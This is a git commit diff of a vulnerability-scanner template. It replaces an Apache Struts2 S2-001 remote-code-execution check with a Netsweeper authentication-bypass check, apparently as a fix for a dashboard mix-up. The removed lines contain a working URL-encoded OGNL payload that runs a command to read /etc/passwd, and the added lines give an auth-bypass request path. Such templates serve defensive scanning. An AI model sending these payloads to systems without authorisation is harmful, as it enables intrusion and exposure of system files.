Restore content from dashboard mess up
parent
108578a42d
commit
4f4b2af6a7
|
@ -1,35 +1,35 @@
|
|||
id: CVE-2007-4556
|
||||
id: CVE-2014-9618
|
||||
|
||||
info:
|
||||
name: Apache Struts2 S2-001 RCE test
|
||||
author: pikpikcu
|
||||
name: Netsweeper 4.0.8 - Authentication Bypass (New Profile Creation)
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
|
||||
description: The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
|
||||
reference:
|
||||
- https://www.guildhab.top/?p=2326
|
||||
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
|
||||
classification:
|
||||
cve-id: CVE-2007-4556
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2014-9618
|
||||
cwe-id: CWE-287
|
||||
tags: cve,cve2014,netsweeper,auth-bypass
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login.action"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||
- '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
|
||||
- 'placeholder="Profile Manager">'
|
||||
- '<title>Netsweeper WebAdmin</title>'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/09
|
||||
|
|
Loading…
Reference in New Issue